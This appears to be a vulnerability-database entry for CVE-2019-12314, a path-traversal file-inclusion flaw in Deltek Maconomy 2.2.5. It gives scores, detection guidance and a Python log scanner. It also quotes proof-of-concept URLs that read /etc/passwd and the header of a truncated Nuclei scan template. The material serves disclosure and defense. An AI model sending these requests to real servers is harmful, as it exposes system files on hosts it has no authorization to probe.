CVE-2019-12314
published 2019-05-24
CVE-2019-12314: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a…
Priority P186 · critical · 9.8 CVSS 3.0
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 84.22% (99.7th percentile)
Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| deltek | maconomy | — | — |
Detection & IOCs
- Detect LFI exploitation attempts against Deltek Maconomy by monitoring HTTP GET requests to the path pattern /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/ followed by an absolute path traversal (e.g., //etc/passwd). The double-slash before the traversal path is characteristic of this exploit.
- A successful exploitation response will contain the string matching 'root:.*:0:0:' in the HTTP response body with a 200 status code, indicating /etc/passwd file contents were returned.
- Monitor for HTTP GET requests targeting the CGI endpoint /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/ with PATH_INFO containing absolute paths (starting with //) as this is the exploitation vector.
- The vulnerability is specific to Deltek Maconomy version 2.2.5. Detection rules should be scoped to this version or validated against the CPE before alerting.
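The checks in the bullets above, as an added detection sketch (not taken from any of the indexed sources): it scans access-log lines for GET requests whose PATH_INFO after the endpoint is an absolute path, and tests a captured response for the `root:.*:0:0:` marker. The Combined Log Format, the sample lines, the documentation IP addresses and the `/Login` path are constructed assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

ENDPOINT = "/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/"
# Combined Log Format (assumed): only the request line and status are needed.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
PASSWD_RE = re.compile(r"root:.*:0:0:")  # response marker quoted on this page


def path_info_is_absolute(target: str) -> bool:
    """True when the request hits the endpoint and PATH_INFO begins with '/'."""
    path = unquote(urlsplit(target).path)  # decode so %2F cannot hide the slash
    if not path.startswith(ENDPOINT):
        return False
    # ENDPOINT already ends in '/', so a further '/' is the double slash.
    return path[len(ENDPOINT):].startswith("/")


def classify_log_line(line: str) -> str:
    """Return 'attempt-200', 'attempt' or 'ignore' for one access-log line."""
    m = LOG_RE.search(line)
    if not m or m["method"] != "GET" or not path_info_is_absolute(m["target"]):
        return "ignore"
    # The access log has no body; a 200 only raises priority for review.
    return "attempt-200" if m["status"] == "200" else "attempt"


def response_discloses_passwd(status: int, body: str) -> bool:
    """Success indicator: HTTP 200 and /etc/passwd content in the body."""
    return status == 200 and PASSWD_RE.search(body) is not None


def scan(lines):
    """Return (index, verdict) for every line that is not ignored."""
    verdicts = ((i, classify_log_line(line)) for i, line in enumerate(lines))
    return [(i, v) for i, v in verdicts if v != "ignore"]


# Constructed sample log lines (not real traffic).
P = "/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS"
SAMPLE_LOG = [
    f'203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET {P}//etc/passwd HTTP/1.1" 200 1543 "-" "-"',
    f'203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET {P}/%2Fetc/passwd HTTP/1.1" 404 210 "-" "-"',
    f'198.51.100.4 - - [01/Jan/2024:10:00:09 +0000] "GET {P}/Login HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.4 - - [01/Jan/2024:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for index, verdict in scan(SAMPLE_LOG):
        print(index, verdict)
```

A 200 in the access log is not proof of disclosure on its own; confirm with `response_discloses_passwd` against a captured response body where one is available.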
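CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |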
GHSA
GHSA-m2jw-qr8p-cx48: Deltek Maconomy 2
ghsa_unreviewed·2022-05-24
CVE-2019-12314 [CRITICAL] CWE-22 GHSA-m2jw-qr8p-cx48: Deltek Maconomy 2
Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd URI.
VulnCheck
deltek maconomy Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2019·CVSS 9.8
CVE-2019-12314 [CRITICAL] deltek maconomy Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.
Affected: deltek maconomy
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2026-03-12&host_type=src&vulnerability=cve-2019-12314; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2026-03-13&host_type=src&vulnerability=cve-2019-12314; https://dashboard.shadowserver.org
No detection rules found.
Exploit-DB
Deltek Maconomy 2.2.5 - Local File Inclusion
exploitdb·2019-05-27·CVSS 9.8
CVE-2019-12314 [CRITICAL] Deltek Maconomy 2.2.5 - Local File Inclusion
---
# Exploit Title: Maconomy Erp local file include
# Date: 22/05/2019
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.deltek.com
# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
# CVE: CVE-2019-12314
POC:
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
Example
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
Nuclei
Deltek Maconomy 2.2.5 - Local File Inclusion
nuclei·CVSS 9.8
CVE-2019-12314 [CRITICAL] Deltek Maconomy 2.2.5 - Local File Inclusion
Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.
Template:
id: CVE-2019-12314
info:
  name: Deltek Maconomy 2.2.5 - Local File Inclusion
  author: madrobot
  severity: critical
  description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, or even a complete compromise of the affected system.
  remediation: |
    Apply the latest secur
No writeups or analysis indexed.
- http://packetstormsecurity.com/files/153079/Deltek-Maconomy-2.2.5-Local-File-Inclusion.html
- https://github.com/JameelNabbo/exploits/blob/master/Maconomy%20Erp%20local%20file%20include.txt
- https://github.com/ras313/CVE-2019-12314/security/advisories/GHSA-8762-rf4g-23xm